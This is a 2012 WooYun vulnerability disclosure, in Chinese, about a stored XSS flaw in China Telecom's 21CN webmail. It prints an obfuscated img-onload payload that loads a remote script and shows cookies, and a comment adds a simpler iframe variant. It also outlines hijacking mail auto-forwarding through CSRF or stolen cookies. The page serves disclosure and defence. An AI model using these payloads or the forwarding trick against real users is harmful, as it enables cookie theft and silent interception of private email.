当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-04719

漏洞标题:中国电信旗下21CN免费邮箱跨站一枚

相关厂商:中国电信

漏洞作者: pestu

提交时间:2012-02-22 16:14

修复时间:2012-04-07 16:15

公开时间:2012-04-07 16:15

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-02-22: 细节已通知厂商并且等待厂商处理中
2012-02-22: 厂商已经确认,细节仅向厂商公开
2012-03-03: 细节向核心白帽子及相关领域专家公开
2012-03-13: 细节向普通白帽子公开
2012-03-23: 细节向实习白帽子公开
2012-04-07: 细节向公众公开

简要描述:

21CN网站(世纪龙信息网络有限责任公司)成立于1999年,是中国电信集团绝对控股的子公司,中国十大门户之一,也是华南最大的门户网站。
提前之前先搜索了一下,找到一个和21cn邮箱有关的http://www.wooyun.org/bugs/wooyun-2010-04175
被忽略了,当然我提交的和这个不一样。
21cn是中国电信189邮箱的开发商,有相同的漏洞一点也不奇怪。貌似我再提交有刷rank的嫌疑了。主要是想和大家分享一下学习心得。

详细说明:

当发送含有javascript脚本的邮件至21cn邮箱时,由于输出邮件正文时没有对特殊关键字进行过滤导致XSS。在邮件正文中插入以下代码

<img src='http://www.baidu.com/img/baidu_logo.gif' onload='var s=document.createElement(String.fromCharCode(115,99,114,105,112,116));s.type=String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);s.src=String.fromCharCode(104,116,116,112,58,47,47,115,116,117,110,111,116,101,46,115,105,110,97,97,112,112,46,99,111,109,47,120,115,115,46,106,115);document.body.appendChild(s);'/>


当用户打开含有以上代码的邮件时,会自动调用http://stunote.sinaapp.com/xss.js
xss.js的内容为:

(function(){
alert(document.domain);
alert(document.cookie);
})();


当然你也可以执行任意的javasrcipt脚本。比如盗取cookie,引到用户至恶意网站,设置自动转发等。
以上代码参考了 WooYun: QQ邮箱XSS,音乐功能导致邮件加载任意javascript
21cn的免费邮箱有一个自动转发的功能。如图:


设置自动转发时提交至服务器的参数如下:


其中active=true表示转发,addresses=转发到哪个邮箱,backup=是否保留邮件备份。
比较典型的http外如下:


因此通过CSRF设置转发或盗取cookie后设置邮件转发是非常容易的事情,设置成功后所有的新邮件都会转发至攻击者的邮箱。

漏洞证明:

把客户引导至wooyun


弹窗1


弹窗2

修复方案:

网易是把一些危险标签如onload,onerror等替换成on_load,on_error,而腾讯和新浪等则是直接干掉这些危险标签。

版权声明:转载请注明来源 pestu@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2012-02-22 22:13

厂商回复:

根据描述内容,先行给予确认,时间关系,暂未进行复现。rank 2。
同时根据此前通报内容再次简要通报中国电信集团公司(明天上班后)。

最新状态:

暂无


漏洞评价:

评论

  1. 2012-02-22 16:47 | pestu ( 普通白帽子 | Rank:170 漏洞数:13 | 关注计算机网络安全 lnmpa技术)

    晕。。贴错图了

  2. 2012-02-22 23:00 | pestu ( 普通白帽子 | Rank:170 漏洞数:13 | 关注计算机网络安全 lnmpa技术)

     好吧,你直接发<iframe onload=alert(document.cookie)>也可以